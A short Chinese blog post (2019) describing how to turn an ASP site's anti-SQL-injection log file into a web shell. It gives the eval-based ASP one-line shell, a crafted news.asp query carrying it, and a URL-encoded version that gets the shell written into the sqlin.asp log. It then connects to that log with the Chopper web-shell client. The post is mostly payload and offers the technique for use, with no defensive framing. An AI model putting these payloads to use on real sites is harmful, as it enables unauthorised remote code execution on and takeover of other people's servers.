本文最后更新于:2019 , 八月 19日 星期一, 8:36 晚上

思路

在进行asp注入的时候,发现网站有通用防注入文件
通过御剑扫描,看到了sqlin.asp文件,是记录防注入的
那我们是否可以提交一个一句话,再进行访问记录文件?

Code

<%eval request("MH")%>

使用上面的一句话

/news.asp?id=1' and 1=<%eval request("MH")%>


会发现没有被记录进去
我们使用URL编码一下

/news.asp?id=1' and 1=%3C%25eval%20request%28%22MH%22%29%25%3E


最后使用菜刀连接防注入asp文件

Web      Sql注入

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!

解析php混淆加密解析的手段
根据404页面判断服务器和系统服务【转载】